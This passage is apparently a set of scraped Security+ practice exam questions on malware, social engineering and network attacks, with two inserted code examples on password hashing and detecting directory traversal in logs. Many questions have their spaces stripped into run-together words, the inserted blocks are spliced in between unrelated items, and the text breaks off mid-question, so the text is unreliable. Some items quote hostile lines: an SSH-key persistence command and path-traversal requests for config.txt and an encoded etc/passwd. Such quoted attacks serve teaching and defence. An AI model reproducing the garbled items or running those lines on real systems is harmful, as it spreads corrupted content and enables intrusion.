39. A sales manager at your company is complaining about slow performance on his computer. When you thoroughly investigate the issue, you find spyware on his computer. He insists that the only thing he has downloaded recently was a freeware stock trading application. What would best explain this situation?

A. Logic bomb
B. Trojan horse
C. Rootkit
D. Macro virus

40. When phishing attacks are so focused that they target a specific high-ranking or important individual, they are called what?

A. Spear phishing
B. Targeted phishing
C. Phishing
D. Whaling

41. What type of threat actors are most likely to have a profit motive for their malicious activities?

A. State actors
B. Script kiddies
C. Hacktivists
D. Criminal syndicates

42. One of your users cannot recall the password for their laptop. You want to recover that password for them. You intend to use a tool/technique that is popular with hackers, and it consists of searching tables of precomputed hashes to recover the password. What best describes this?

A. Rainbow table
B. Backdoor
C. Social engineering
D. Dictionary attack
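Question 42 and question 8 are two sides of the same mechanism: a table of precomputed hashes only works when the stored hash depends on the password alone, which is exactly what a salt, a pepper and a purpose-built slow hash remove. The following is an added example written for this edit, not code from the book: a precomputed lookup against unsalted MD5, then the same candidates against salted, peppered PBKDF2. The candidate list, pepper and iteration count are assumptions, and the dictionary stands in for a real rainbow table, which trades storage for chain-walking time but has the same precondition.

```python
"""Added example, not code from the book: why the precomputed-hash lookup of
question 42 works against unsalted hashes, and how the salt, pepper and
purpose-built algorithm of question 8 defeat it. The candidate list, pepper and
iteration count are constructed for the illustration. The lookup table is a plain
dictionary, a simplification of a real rainbow table (which trades storage for
chain-walking time), but it has the same precondition: the stored hash must
depend on the password alone."""
import hashlib
import hmac
import os

CANDIDATES = ["password", "letmein", "Summer2020", "correct horse", "qwerty123"]  # constructed wordlist
PEPPER = b"server-side-secret-kept-outside-the-database"                        # assumed
ITERATIONS = 100_000   # assumed; tune to your hardware, higher in production


def md5_hex(password: str) -> str:
    """Unsalted, fast hash of the kind a precomputed table targets."""
    return hashlib.md5(password.encode()).hexdigest()


def build_lookup_table(candidates):
    """Hash every candidate once; the table is reusable against any dump."""
    return {md5_hex(c): c for c in candidates}


def crack_unsalted(stored_hash: str, table):
    """One dictionary lookup per stored hash: no hashing work at attack time."""
    return table.get(stored_hash)


def hash_password(password: str, salt=None, pepper=PEPPER):
    """Per-user random salt (stored beside the hash) + secret pepper (stored apart
    from the database) + a deliberately slow KDF. Returns (salt, derived key)."""
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode() + pepper, salt, ITERATIONS)
    return salt, dk


def verify_password(password: str, salt: bytes, expected: bytes, pepper=PEPPER) -> bool:
    _, dk = hash_password(password, salt, pepper)
    return hmac.compare_digest(dk, expected)   # constant-time comparison


def crack_salted(salt: bytes, stored: bytes, candidates, pepper: bytes):
    """No table helps: the salt forces the full KDF cost per candidate, per user,
    and without the right pepper even the correct password does not verify."""
    for c in candidates:
        if verify_password(c, salt, stored, pepper):
            return c
    return None
```

The salt alone is what makes the table useless (two users with the same password get different hashes, so nothing can be precomputed once and reused); the slow KDF raises the per-guess cost; the pepper means a dump of the database table alone is not enough to begin guessing. Option D of question 8, reversible encryption, is the odd one out because whoever holds the key recovers every password at once.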

43. What risk is commonly associated with a lack of vendor support for a product, such as an outdated version of a device?

A. Improper data storage
B. Lack of patches or updates
C. Lack of available documentation
D. System integration and configuration issues

44. You have noticed that when in a crowded area, you sometimes get a stream of unwanted text messages. The messages end when you leave the area. What describes this attack?

A. Bluejacking
B. Bluesnarfing
C. Evil twin
D. Rogue access point

45. Dennis uses an on-path attack to cause a system to send HTTPS traffic to his system and then forwards it to the actual server the traffic is intended for. What type of password attack can he conduct with the data he gathers if he captures all the traffic from a login form?

A. A plain-text password attack
B. A pass-the-hash attack
C. A SQL injection attack
D. A cross-site scripting attack

46. Someone has been rummaging through your company's trash bins seeking to find documents, diagrams, or other sensitive information that has been thrown out. What is this called?

A. Dumpster diving
B. Trash diving
C. Social engineering
D. Trash engineering

47. Louis is investigating a malware incident on one of the computers on his network. He has discovered unknown software that seems to be opening a port, allowing someone to remotely connect to the computer. This software seems to have been installed at the same time as a small shareware application. Which of the following best describes this malware?

A. RAT
B. Worm
C. Logic bomb
D. Rootkit

48. Jared is responsible for network security at his company. He has discovered behavior on one computer that certainly appears to be a virus. He has even identified a file he thinks might be the virus. However, using three separate antivirus programs, he finds that none can detect the file. Which of the following is most likely to be occurring?

A. The computer has a RAT.
B. The computer has a zero-day exploit.
C. The computer has a worm.
D. The computer has a rootkit.

49. Which of the following is not a common means of attacking RFID badges?

A. Data capture
B. Spoofing
C. Denial-of-service
D. Birthday attacks

50. Your wireless network has been breached. It appears the attacker modified a portion of data used with the stream cipher and used this to expose wirelessly encrypted data. What is this attack called?

A. Evil twin
B. Rogue WAP
C. IV attack
D. WPS attack

51. The company that Scott works for has experienced a data breach, and the personal information of thousands of customers has been exposed. Which of the following impact categories is not a concern as described in this scenario?

A. Financial

B. Reputation

C. Availabilityloss

D. Dataloss

52. Whattypeofattackexploitsthetrustthatawebsitehasforanauthenticatedusertoattackthatwebsitebyspoofingrequestsfromthetrusteduser?

A. Cross-sitescripting

B. Cross-siterequestforgery

C. Bluejacking

D. Eviltwin

53. Whatpurposedoesafusioncenterserveincyberintelligenceactivities?

A. Itpromotesinformationsharingbetweenagenciesororganizations.

B. Itcombinessecuritytechnologiestocreatenew,morepowerfultools.

C. Itgeneratespowerforthelocalcommunityinasecureway.

D. Itseparatesinformationbyclassificationratingstoavoidaccidentaldistribution.

54. CVEisanexampleofwhattypeoffeed?

A. Athreatintelligencefeed

B. Avulnerabilityfeed

C. Acriticalinfrastructurelistingfeed

D. Acriticalvirtualizationexploitsfeed

55. Whattypeofattackisabirthdayattack?

Telegram Channel @nettrain

A. Asocialengineeringattack

B. Acryptographicattack

C. Anetworkdenial-of-serviceattack

D. ATCP/IPprotocolattack

56. JuanitaisanetworkadministratorforAcmeCompany.Someuserscomplainthattheykeepgettingdroppedfromthenetwork.WhenJuanitachecksthelogsforthewirelessaccesspoint(WAP),shefindsthatadeauthenticationpackethasbeensenttotheWAPfromtheusers'IPaddresses.Whatseemstobehappeninghere?

A. Problemwithusers'Wi-Ficonfiguration

B. Disassociationattack

C. Sessionhijacking

D. Backdoorattack

57. Johnhasdiscoveredthatanattackeristryingtogetnetworkpasswordsbyusingsoftwarethatattemptsanumberofpasswordsfromalistofcommonpasswords.Whattypeofattackisthis?

A. Dictionary

B. Rainbowtable

C. Bruteforce

D. Sessionhijacking

58. Youareanetworksecurityadministratorforabank.YoudiscoverthatanattackerhasexploitedaflawinOpenSSLandforcedsomeconnectionstomovetoaweakciphersuiteversionofTLS,whichtheattackercouldbreach.Whattypeofattackwasthis?

A. Disassociationattack

B. Downgradeattack

C. Sessionhijacking

D. Bruteforce

59. Whenanattackertriestofindaninputvaluethatwillproducethesamehashasapassword,whattypeofattackisthis?

Telegram Channel @nettrain

A. Rainbowtable

B. Bruteforce

C. Sessionhijacking

D. Collisionattack

60. Farèsisthenetworksecurityadministratorforacompanythatcreatesadvancedroutersandswitches.Hehasdiscoveredthathiscompany'snetworkshavebeensubjectedtoaseriesofadvancedattacksoveraperiodoftime.Whatbestdescribesthisattack?

A. DDoS

B. Bruteforce

C. APT

D. Disassociationattack

61. Whattypeofinformationisphishingnotcommonlyintendedtoacquire?

A. Passwords

B. Emailaddresses

C. Creditcardnumbers

D. Personalinformation

62. JohnisrunninganIDSonhisnetwork.UserssometimesreportthattheIDSflagslegitimatetrafficasanattack.Whatdescribesthis?

A. Falsepositive

B. Falsenegative

C. Falsetrigger

D. Falseflag

63. Scottdiscoversthatmalwarehasbeeninstalledononeofthesystemsheisresponsiblefor.Shortlyafterwardpasswordsusedbytheuserthatthesystemisassignedtoarediscoveredtobeinusebyattackers.WhattypeofmaliciousprogramshouldScottlookforonthecompromisedsystem?

A. Arootkit

B. Akeylogger

Telegram Channel @nettrain

C. Aworm

D. Noneoftheabove

64. Youareperformingapenetrationtestofyourcompany'snetwork.Aspartofthetest,youwillbegivenaloginwithminimalaccessandwillattempttogainadministrativeaccesswiththisaccount.Whatisthiscalled?

A. Privilegeescalation

B. Sessionhijacking

C. Rootgrabbing

D. Climbing

65. MattdiscoversthatasystemonhisnetworkissendinghundredsofEthernetframestotheswitchitisconnectedto,witheachframecontainingadifferentsourceMACaddress.Whattypeofattackhashediscovered?

A. Etherspam

B. MACflooding

C. Hardwarespoofing

D. MAChashing

66. Spywareisanexampleofwhattypeofmalware?

A. Trojan

B. PUP

C. RAT

D. Ransomware

67. Maryhasdiscoveredthatawebapplicationusedbyhercompanydoesnotalwayshandlemultithreadingproperly,particularlywhenmultiplethreadsaccessthesamevariable.Thiscouldallowanattackerwhodiscoveredthisvulnerabilitytoexploititandcrashtheserver.WhattypeoferrorhasMarydiscovered?

A. Bufferoverflow

B. Logicbomb

C. Raceconditions

D. Impropererrorhandling

Telegram Channel @nettrain

68. Anattackeristryingtogetaccesstoyournetwork.Heissendingusersonyournetworkalinktoanewgamewithahackedlicensecodeprogram.However,thegamefilesalsoincludesoftwarethatwillgivetheattackeraccesstoanymachinethatitisinstalledon.Whattypeofattackisthis?

A. Rootkit

B. Trojanhorse

C. Spyware

D. Bootsectorvirus

69. ThefollowingimageshowsareportfromanOpenVASsystem.Whattypeofweakconfigurationisshownhere?

A. Weakencryption

B. Unsecuredadministrativeaccounts

C. Openportsandservices

D. Unsecureprotocols

70. Whileconductingapenetrationtest,Anniescansforsystemsonthenetworkshehasgainedaccessto.Shediscoversanothersystemwithinthesamenetworkthathasthesameaccountsandusertypesastheonesheison.Sinceshealreadyhasavaliduseraccountonthesystemshehasalreadyaccessed,sheisabletologintoit.Whattypeoftechniqueisthis?

Telegram Channel @nettrain

A. Lateralmovement

B. Privilegeescalation

C. Privilegeretention

D. Verticalmovement

71. AmandascansaRedHatLinuxserverthatshebelievesisfullypatchedanddiscoversthattheApacheversionontheserverisreportedasvulnerabletoanexploitfromafewmonthsago.Whenshecheckstoseeifsheismissingpatches,Apacheisfullypatched.Whathasoccurred?

A. Afalsepositive

B. Anautomaticupdatefailure

C. Afalsenegative

D. AnApacheversionmismatch

72. Whenaprogramhasvariables,especiallyarrays,anddoesnotchecktheboundaryvaluesbeforeinputtingdata,whatattackistheprogramvulnerableto?

A. XSS

B. CSRF

C. Bufferoverflow

D. Logicbomb

73. Tracyisconcernedthatthesoftwareshewantstodownloadmaynotbetrustworthy,soshesearchesforitandfindsmanypostingsclaimingthatthesoftwareislegitimate.Ifsheinstallsthesoftwareandlaterdiscoversitismaliciousandthatmaliciousactorshaveplantedthosereviews,whatprincipleofsocialengineeringhavetheyused?

A. Scarcity

B. Familiarity

C. Consensus

D. Trust

74. Whichofthefollowingbestdescribesmalwarethatwillexecutesomemaliciousactivitywhenaparticularconditionismet(i.e.,iftheconditionis

Telegram Channel @nettrain

met,thenexecuted)?

A. Bootsectorvirus

B. Logicbomb

C. Bufferoverflow

D. Sparseinfectorvirus

75. Whattermdescribesusingconversationaltacticsaspartofasocialengineeringexercisetoextractinformationfromtargets?

A. Pretexting

B. Elicitation

C. Impersonation

D. Intimidation

76. Telnet,RSH,andFTPareallexamplesofwhat?

A. Filetransferprotocols

B. Unsecureprotocols

C. Coreprotocols

D. Openports

77. Scottwantstodeterminewhereanorganization'swirelessnetworkcanbeaccessedfrom.Whattestingtechniquesarehismostlikelyoptions?

A. OSINTandactivescans

B. Wardrivingandwarflying

C. Socialengineeringandactivescans

D. OSINTandwardriving

78. Geraldisanetworkadministratorforasmallfinancialservicescompany.Usersarereportingoddbehaviorthatappearstobecausedbyavirusontheirmachines.Afterisolatingthemachinesthathebelievesareinfected,Geraldanalyzesthem.Hefindsthatalltheinfectedmachinesreceivedanemailpurportingtobefromaccounting,withanExcelspreadsheet,andtheusersopenedthespreadsheet.Whatisthemostlikelyissueonthesemachines?

A. Amacrovirus

Telegram Channel @nettrain

B. Abootsectorvirus

C. ATrojanhorse

D. ARAT

79. Yourcompanyhashiredanoutsidesecurityfirmtoperformvarioustestsofyournetwork.Duringthevulnerabilityscan,youwillprovidethatcompanywithloginsforvarioussystems(i.e.,databaseserver,applicationserver,webserver,etc.)toaidintheirscan.Whatbestdescribesthis?

A. Aknownenvironmenttest

B. Agray-boxtest

C. Acredentialedscan

D. Anintrusivescan

80. Steve discovers the following code on a system. What language is it written in, and what does it do?

    import socket as skt

    # Walk the port range and attempt a TCP connection to each port on the local host.
    for port in range(1, 9999):
        try:
            sc = skt.socket(skt.AF_INET, skt.SOCK_STREAM)
            sc.settimeout(900)
            sc.connect(('127.0.0.1', port))
            print('%d:OPEN' % (port))
            sc.close()
        except:
            continue

A. Perl, vulnerability scanning

B. Python, port scanning

C. Bash, vulnerability scanning

D. PowerShell, port scanning

81. Which of the following is commonly used in a distributed denial-of-service (DDoS) attack?

A. Phishing

B. Adware

C. Botnet

D. Trojan

82. Amanda discovers that a member of her organization's staff has installed a remote access Trojan on their accounting software server and has been accessing it remotely. What type of threat has she discovered?

A. Zero-day

B. Insider threat

C. Misconfiguration

D. Weak encryption

83. Postings from Russian agents during the 2016 U.S. presidential campaign to Facebook and Twitter are an example of what type of effort?

A. Impersonation

B. A social media influence campaign

C. Asymmetric warfare

D. A watering hole attack

84. Juan is responsible for incident response at a large financial institution. He discovers that the company Wi-Fi has been breached. The attacker used the same login credentials that ship with the wireless access point (WAP). The attacker was able to use those credentials to access the WAP administrative console and make changes. Which of the following best describes what caused this vulnerability to exist?

A. Improperly configured accounts

B. Untrained users

C. Using default settings

D. Failure to patch systems

85. Elizabeth is investigating a network breach at her company. She discovers a program that was able to execute code within the address space of another process by using the target process to load a specific library. What best describes this attack?

A. Logic bomb

B. Session hijacking

C. Buffer overflow

D. DLL injection

86. Which of the following threat actors is most likely to be associated with an advanced persistent threat (APT)?

A. Hacktivists

B. State actors

C. Script kiddies

D. Insider threats

87. What is the primary difference between an intrusive and a nonintrusive vulnerability scan?

A. An intrusive scan is a penetration test.

B. A nonintrusive scan is just a document check.

C. An intrusive scan could potentially disrupt operations.

D. A nonintrusive scan won't find most vulnerabilities.

88. Your company outsourced development of an accounting application to a local programming firm. After three months of using the product, one of your administrators discovers that the developers have inserted a way to log in and bypass all security and authentication. What best describes this?

A. Logic bomb

B. Trojan horse

C. Backdoor

D. Rootkit

89. Daryl is investigating a recent breach of his company's web server. The attacker used sophisticated techniques and then defaced the website, leaving messages that were denouncing the company's public policies. He and his team are trying to determine the type of actor who most likely committed the breach. Based on the information provided, who was the most likely threat actor?

A. A script

B. A nation-state

C. Organized crime

D. Hacktivists

90. What two techniques are most commonly associated with a pharming attack?

A. Modifying the hosts file on a PC or exploiting a DNS vulnerability on a trusted DNS server

B. Phishing many users and harvesting email addresses from them

C. Phishing many users and harvesting many passwords from them

D. Spoofing DNS server IP addresses or modifying the hosts file on a PC

91. Angela reviews the authentication logs for her website and sees attempts from many different accounts using the same set of passwords. What is this attack technique called?

A. Brute forcing

B. Password spraying

C. Limited login attacks

D. Account spinning

92. When investigating breaches and attempting to attribute them to specific threat actors, which of the following is not one of the indicators of an APT?

A. Long-term access to the target

B. Sophisticated attacks

C. The attack comes from a foreign IP address.

D. The attack is sustained over time.

93. Charles discovers that an attacker has used a vulnerability in a web application that his company runs and has then used that exploit to obtain root privileges on the web server. What type of attack has he discovered?

A. Cross-site scripting

B. Privilege escalation

C. A SQL injection

D. A race condition

94. What type of attack uses a second wireless access point (WAP) that broadcasts the same SSID as a legitimate access point, in an attempt to get users to connect to the attacker's WAP?

A. Evil twin

B. IP spoofing

C. Trojan horse

D. Privilege escalation

95. Which of the following best describes a zero-day vulnerability?

A. A vulnerability that the vendor is not yet aware of

B. A vulnerability that has not yet been breached

C. A vulnerability that can be quickly exploited (i.e., in zero days)

D. A vulnerability that will give the attacker brief access (i.e., zero days)

96. What type of attack involves adding an expression or phrase such as adding "SAFE" to mail headers?

A. Pretexting

B. Phishing

C. SQL injection

D. Prepending

97. Charles wants to ensure that his outsourced code development efforts are as secure as possible. Which of the following is not a common practice to ensure secure remote code development?

A. Ensure developers are trained on secure coding techniques.

B. Set defined acceptance criteria for code security.

C. Test code using automated and manual security testing systems.

D. Audit all underlying libraries used in the code.

98. You have discovered that there are entries in your network's domain name server that point legitimate domains to unknown and potentially harmful IP addresses. What best describes this type of attack?

A. A backdoor

B. An APT

C. DNS poisoning

D. A Trojan horse

99. Spyware is an example of what type of malicious software?

A. A CAT

B. A worm

C. A PUP

D. A Trojan

100. What best describes an attack that attaches some malware to a legitimate program so that when the user installs the legitimate program, they inadvertently install the malware?

A. Backdoor

B. Trojan horse

C. RAT

D. Polymorphic virus

101. Which of the following best describes software that will provide the attacker with remote access to the victim's machine but that is wrapped with a legitimate program in an attempt to trick the victim into installing it?

A. RAT

B. Backdoor

C. Trojan horse

D. Macro virus

102. What process typically occurs before card cloning attacks occur?

A. A brute-force attack

B. A skimming attack

C. A rainbow table attack

D. A birthday attack

103. Which of the following is an attack that seeks to attack a website, based on the website's trust of an authenticated user?

A. XSS

B. XSRF

C. Buffer overflow

D. RAT

104. Valerie is responsible for security testing applications in her company. She has discovered that a web application, under certain conditions, can generate a memory leak. What type of attack would this leave the application vulnerable to?

A. DoS

B. Backdoor

C. SQL injection

D. Buffer overflow

105. The mobile game that Jack has spent the last year developing has been released, and malicious actors are sending traffic to the server that runs it to prevent it from competing with other games in the App Store. What type of denial-of-service attack is this?

A. A network DDoS

B. An operational technology DDoS

C. A GDoS

D. An application DDoS

106. Charles has been tasked with building a team that combines techniques from attackers and defenders to help protect his organization. What type of team is he building?

A. A red team

B. A blue team

C. A white team

D. A purple team

107. Mike is a network administrator with a small financial services company. He has received a pop-up window that states his files are now encrypted and he must pay .5 bitcoins to get them decrypted. He tries to check the files in question, but their extensions have changed, and he cannot open them. What best describes this situation?

A. Mike's machine has a rootkit.

B. Mike's machine has ransomware.

C. Mike's machine has a logic bomb.

D. Mike's machine has been the target of whaling.

108. When a multithreaded application does not properly handle various threads accessing a common value, and one thread can change the data while another thread is relying on it, what flaw is this?

A. Memory leak

B. Buffer overflow

C. Integer overflow

D. Time of check/time of use

109. Acme Company is using smartcards that use near-field communication (NFC) rather than needing to be swiped. This is meant to make physical access to secure areas more secure. What vulnerability might this also create?

A. Tailgating

B. Eavesdropping

C. IP spoofing

D. Race conditions

110. Rick believes that Windows systems in his organization are being targeted by fileless viruses. If he wants to capture artifacts of their infection process, which of the following options is most likely to provide him with a view into what they are doing?

A. Reviewing full-disk images of infected machines

B. Turning on PowerShell logging

C. Disabling the administrative user account

D. Analyzing Windows crash dump files

111. John is responsible for physical security at a large manufacturing plant. Employees all use a smartcard in order to open the front door and enter the facility. Which of the following is a common way attackers would circumvent this system?

A. Phishing

B. Tailgating

C. Spoofing the smartcard

D. RFID spoofing

112. Adam wants to download lists of malicious or untrustworthy IP addresses and domains using STIX and TAXII. What type of service is he looking for?

A. A vulnerability feed

B. A threat feed

C. A hunting feed

D. A rule feed

113. During an incident investigation, Naomi notices that a second keyboard was plugged into a system in a public area of her company's building. Shortly after that event, the system was infected with malware, resulting in a data breach. What should Naomi look for in her in-person investigation?

A. A Trojan horse download

B. A malicious USB cable or drive

C. A worm

D. None of the above

114. You are responsible for incident response at Acme Corporation. You have discovered that someone has been able to circumvent the Windows authentication process for a specific network application. It appears that the attacker took the stored hash of the password and sent it directly to the backend authentication service, bypassing the application. What type of attack is this?

A. Hash spoofing

B. Evil twin

C. Shimming

D. Pass the hash

115. A user in your company reports that she received a call from someone claiming to be from the company technical support team. The caller stated that there was a virus spreading through the company and they needed immediate access to the employee's computer to stop it from being infected. What social-engineering principles did the caller use to try to trick the employee?

A. Urgency and intimidation

B. Urgency and authority

C. Authority and trust

D. Intimidation and authority

116. After running a vulnerability scan, Elaine discovers that the Windows 10 workstations in her company's warehouse are vulnerable to multiple known Windows exploits. What should she identify as the root cause in her report to management?

A. Unsupported operating systems

B. Improper or weak patch management for the operating systems

C. Improper or weak patch management for the firmware of the systems

D. Use of unsecure protocols

117. Ahmed has discovered that attackers spoofed IP addresses to cause them to resolve to a different hardware address. The manipulation has changed the tables maintained by the default gateway for the local network, causing data destined for one specific MAC address to now be routed elsewhere. What type of attack is this?

A. ARP poisoning

B. DNS poisoning

C. On-path attack

D. Backdoor

118. What type of penetration test is being done when the tester is given extensive knowledge of the target network?

A. Known environment

B. Full disclosure

C. Unknown environment

D. Red team

119. Your company is instituting a new security awareness program. You are responsible for educating end users on a variety of threats, including social engineering. Which of the following best defines social engineering?

A. Illegal copying of software

B. Gathering information from discarded manuals and printouts

C. Using people skills to obtain proprietary information

D. Phishing emails

120. Which of the following attacks can be caused by a user being unaware of their physical surroundings?

A. ARP poisoning

B. Phishing

C. Shoulder surfing

D. Smurf attack

121. What are the two most common goals of invoice scams?

A. Receiving money or acquiring credentials

B. Acquiring credentials or delivering a rootkit

C. Receiving money or stealing cryptocurrency

D. Acquiring credentials or delivering ransomware

122. Which of the following types of testing uses an automated process of proactively identifying vulnerabilities of the computing systems present on a network?

A. Security audit

B. Vulnerability scanning

C. A known environment test

D. An unknown environment test

123. John has been asked to do a penetration test of a company. He has been given general information but no details about the network. What kind of test is this?

A. Partially known environment

B. Known environment

C. Unknown environment

D. Masked

124. Under which type of attack does an attacker's system appear to be the server to the real client and appear to be the client to the real server?

A. Denial-of-service

B. Replay

C. Eavesdropping

D. On-path

125. You are a security administrator for Acme Corporation. You have discovered malware on some of your company's machines. This malware seems to intercept calls from the web browser to libraries, and then manipulates the browser calls. What type of attack is this?

A. Man in the browser

B. On-path attack

C. Buffer overflow

D. Session hijacking

126. Tony is reviewing a web application and discovers the website generates links like the following:

    https://www.example.com/login.html?Relay=http%3A%2F%2Fexample.com%2Fsite.html

What type of vulnerability is this code most likely to be susceptible to?

A. SQL injection

B. URL redirection

C. DNS poisoning

D. LDAP injection

127. You are responsible for software testing at Acme Corporation. You want to check all software for bugs that might be used by an attacker to gain entrance into the software or your network. You have discovered a web application that would allow a user to attempt to put a 64-bit value into a 4-byte integer variable. What is this type of flaw?

A. Memory overflow

B. Buffer overflow

C. Variable overflow

D. Integer overflow

128. Angela has discovered an attack against some of the users of her website that leverages URL parameters and cookies to make legitimate users perform unwanted actions. What type of attack has she most likely discovered?

A. SQL injection

B. Cross-site request forgery

C. LDAP injection

D. Cross-site scripting

129. Nathan discovers the following code in the directory of a compromised user. What language is it using, and what will it do?

    echo "ssh-rsa ABBAB4KAE9sdafAK…Mq/jc5YLfnAnbFDRABMhuWzaWUp root@localhost" >> /root/.ssh/authorized_keys

A. Python, adds an authorized SSH key

B. Bash, connects to another system using an SSH key

C. Python, connects to another system using an SSH key

D. Bash, adds an authorized SSH key

130. Jared has discovered malware on the workstations of several users. This particular malware provides administrative privileges for the workstation to an external hacker. What best describes this malware?

A. Trojan horse

B. Logic bomb

C. Multipartite virus

D. Rootkit

131. Why are memory leaks a potential security issue?

A. They can expose sensitive data.

B. They can allow attackers to inject code via the leak.

C. They can cause crashes.

D. None of the above

132. Michelle discovers that a number of systems throughout her organization are connecting to a changing set of remote systems on TCP port 6667. What is the most likely cause of this, if she believes the traffic is not legitimate?

A. An alternate service port for web traffic

B. Botnet command and control via IRC

C. Downloads via a peer-to-peer network

D. Remote access Trojans

133. Susan performs a vulnerability scan of a small business network and discovers that the organization's consumer-grade wireless router has a vulnerability in its web server. What issue should she address in her findings?

A. Firmware patch management

B. Default configuration issues

C. An unsecured administrative account

D. Weak encryption settings

134. Where is an RFID attack most likely to occur as part of a penetration test?

A. System authentication

B. Access badges

C. Web application access

D. VPN logins

135. What type of phishing attack occurs via text messages?

A. Bluejacking

B. Smishing

C. Phone jacking

D. Text whaling

136. Users in your company report someone has been calling their extension and claiming to be doing a survey for a large vendor. Based on the questions asked in the survey, you suspect that this is a scam to elicit information from your company's employees. What best describes this?

A. Spear phishing

B. Vishing

C. War dialing

D. Robocalling

137. John is analyzing a recent malware infection on his company network. He discovers malware that can spread rapidly via vulnerable network services and does not require any interaction from the user. What best describes this malware?

A. Worm

B. Virus

C. Logic bomb

D. Trojan horse

138. Your company has issued some new security directives. One of these new directives is that all documents must be shredded before being thrown out. What type of attack is this trying to prevent?

A. Phishing

B. Dumpster diving

C. Shoulder surfing

D. On-path attack

139. Which of the following is not a common part of a cleanup process after a penetration test?

A. Removing all executables and scripts from the compromised system

B. Restoring all rootkits to their original settings on the system

C. Returning all system settings and application configurations to their original configurations

D. Removing any user accounts created during the penetration test

140. You have discovered that someone has been trying to log on to your web server. The person has tried a wide range of likely passwords. What type of attack is this?

A. Rainbow table

B. Birthday attack

C. Dictionary attack

D. Spoofing

141. Jim discovers a physical device attached to a gas pump's credit card reader. What type of attack has he likely discovered?

A. A replay attack

B. A race condition

C. A skimmer

D. A card cloner

142. What is the primary difference between active and passive reconnaissance?

A. Active will be done manually, passive with tools.

B. Active is done with black-box tests and passive with white-box tests.

C. Active is usually done by attackers and passive by testers.

D. Active will actually connect to the network and could be detected; passive won't.

143. A browser toolbar is an example of what type of malware?

A. A rootkit

B. A RAT

C. A worm

D. A PUP

144. What term describes data that is collected from publicly available sources that can be used in an intelligence context?

A. OPSEC

B. OSINT

C. IntCon

D. STIX

145. What type of attack targets a specific group of users by infecting one or more websites that that group is specifically known to visit frequently?

A. A watercooler attack

B. A phishing net attack

C. A watering hole attack

D. A phish pond attack

146. Tracy is concerned about LDAP injection attacks against her directory server. Which of the following is not a common technique to prevent LDAP injection attacks?

A. Secure configuration of LDAP

B. User input validation

C. LDAP query parameterization

D. Output filtering rules

147. Fred uses a Tor proxy to browse for sites as part of his threat intelligence. What term is frequently used to describe this part of the Internet?

A. Through the looking glass

B. The dark web

C. The underweb

D. Onion-space

148. What browser feature is used to help prevent successful URL redirection attacks?

A. Certificate expiration tracking

B. Displaying the full real URL

C. Disabling cookies

D. Enabling JavaScript

149. What is the most significant difference between cloud service-based and on-premises vulnerabilities?

A. Your ability to remediate it yourself

B. The severity of the vulnerability

C. The time required to remediate

D. Your responsibility for compromised data

150. Christina runs a vulnerability scan of a customer network and discovers that a consumer wireless router on the network returns a result reporting default login credentials. What common configuration issue has she encountered?

A. An unpatched device

B. An out of support device

C. An unsecured administrator account

D. An unsecured user account

151. What type of team is used to test security by using tools and techniques that an actual attacker would use?

A. A red team

B. A blue team

C. A white team

D. A purple team

152. While reviewing web logs for her organization's website, Kathleen discovers the entry shown here:

    GET http://example.com/viewarticle.php?view=../../../config.txt HTTP/1.1

What type of attack has she potentially discovered?

A. A directory traversal attack

B. A web application buffer overflow

C. A directory recursion attack

D. A slashdot attack
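A small log filter, added here as an example and not part of the book, that flags requests like the entry Kathleen found. It percent-decodes the request target (repeatedly, so double-encoded variants such as %252e%252e are not missed) before looking for a ".." segment, and separates the attempts the server answered with a 2xx status, which are the ones most likely to have returned a file. The log lines are constructed samples in the common combined format.

```python
"""Flag directory traversal attempts in web server access logs.

Added example for the log entry in question 152; the log lines below are
constructed samples in the common "combined" format, not data from the book.
"""
import re
from urllib.parse import unquote

# Constructed sample access log: three traversal attempts (one plain, one
# percent-encoded, one double-encoded) and two benign requests.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2021:13:55:36 +0000] "GET /viewarticle.php?view=../../../config.txt HTTP/1.1" 200 512
203.0.113.5 - - [10/Mar/2021:13:55:40 +0000] "GET /viewarticle.php?view=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 404 231
198.51.100.7 - - [10/Mar/2021:13:56:02 +0000] "GET /viewarticle.php?view=42 HTTP/1.1" 200 8192
198.51.100.7 - - [10/Mar/2021:13:56:10 +0000] "GET /images/logo..png HTTP/1.1" 200 1024
203.0.113.9 - - [10/Mar/2021:13:57:01 +0000] "GET /viewarticle.php?view=..%252f..%252fconfig.txt HTTP/1.1" 200 512
"""

# Client IP, timestamp, method, request target and status from a combined-format line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Separators between path and query segments; backslash covers Windows-style paths.
SEGMENT_SPLIT = re.compile(r"[/\\?=&]")


def decode_fully(value, max_rounds=3):
    """Percent-decode until stable so %252e%252e (double encoding) still becomes '..'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def has_traversal(target):
    """True if any path or query segment of the decoded target is exactly '..'.

    Splitting into segments avoids false positives on names such as 'logo..png'.
    """
    return any(seg == ".." for seg in SEGMENT_SPLIT.split(decode_fully(target)))


def find_traversal_attempts(log_text):
    """Return (ip, status, decoded_target) for each request carrying a traversal sequence."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue  # skip lines that are not requests (or are malformed)
        if has_traversal(match["target"]):
            hits.append((match["ip"], int(match["status"]), decode_fully(match["target"])))
    return hits


def successful_attempts(hits):
    """Traversal requests answered with 2xx deserve the first look: they may have returned a file."""
    return [hit for hit in hits if 200 <= hit[1] < 300]


if __name__ == "__main__":
    found = find_traversal_attempts(SAMPLE_LOG)
    for ip, status, target in found:
        print(f"{ip} {status} {target}")
    print(f"{len(successful_attempts(found))} of {len(found)} attempts returned 2xx")
```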

153. WhatisthekeydifferentiatorbetweenSOARandSIEMsystems?

Telegram Channel @nettrain

A. SOARintegrateswithawiderrangeofapplications.

B. SIEMincludesthreatandvulnerabilitymanagementtools.

C. SOARincludessecurityoperationsautomation.

D. SIEMincludessecurityoperationsautomation.

154. Yourcompanyhashiredapenetrationtestingfirmtotestthenetwork.Forthetest,youhavegiventhecompanydetailsonoperatingsystemsyouuse,applicationsyourun,andnetworkdevices.Whatbestdescribesthistypeoftest?

A. Knownenvironmenttest

B. Externaltest

C. Unknownenvironmenttest

D. Threattest

155. Whattwofilesarecommonlyattackedusingofflinebrute-forceattacks?

